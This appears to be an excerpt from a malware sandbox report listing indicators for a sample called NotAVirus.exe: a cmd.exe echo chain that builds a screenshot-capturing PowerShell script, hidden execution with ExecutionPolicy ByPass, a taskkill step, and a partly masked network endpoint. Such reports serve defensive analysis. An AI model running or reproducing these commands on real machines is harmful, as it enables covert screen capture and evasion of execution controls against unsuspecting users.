Technical Information (observed commands, files and network indicators)
- '%WINDIR%\syswow64\taskkill.exe' /f /im NotAVirus.exe
- <Current directory>\ps.ps1 (the script written by the cmd.exe echo chain listed below)
- <Current directory>\screenshot.bmp (the $outputFile named in ps.ps1)
- Network endpoint: 'se##eo.net':1156 (the domain is printed with '##', apparently masking part of the name)
- DNS query (ASK): se##eo.net
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c cmd.exe /c echo $outputFile = "screenshot.bmp" > ps.ps1 & echo Add-Type -AssemblyName System.Windows.Forms >> ps.ps1 & echo Add-type -AssemblyName System.Drawing >> ps.ps1 & echo $Screen = [...
- '%WINDIR%\syswow64\cmd.exe' /c echo $outputFile = "screenshot.bmp"
- '%WINDIR%\syswow64\cmd.exe' /c start /b /min cmd.exe /c powershell -ExecutionPolicy ByPass -File ps.ps1
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy ByPass -File ps.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -File ps.ps1
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im NotAVirus.exe